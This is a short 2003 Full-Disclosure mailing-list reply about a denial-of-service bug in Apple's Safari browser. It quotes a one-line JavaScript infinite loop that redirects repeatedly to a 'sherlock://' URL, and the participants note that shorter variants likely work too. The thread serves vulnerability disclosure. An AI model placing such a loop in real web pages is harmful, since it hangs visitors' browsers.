[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] safari dos
- To: Christian Horchert <chorchert@veedev.de>, full-disclosure@lists.netsys.com
- Subject: Re: [Full-Disclosure] safari dos
- From: "kang@insecure.ws" <kang@insecure.ws>
- Date: Sun, 23 Nov 2003 03:10:03 +0100
Christian Horchert wrote:
Am 22.11.2003 um 01:58 schrieb kang@insecure.ws:
A very simple javascript block like this one:
while (true)
{ document.location "sherlock://com.apple.movies?" }
or just shorter while(1){}
Christian
Ahaha, I'm not sure that it makes a very significant change :)
probably even just "sherlock://" works
and probably some other loops are vulnerable, but it's the same kind
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html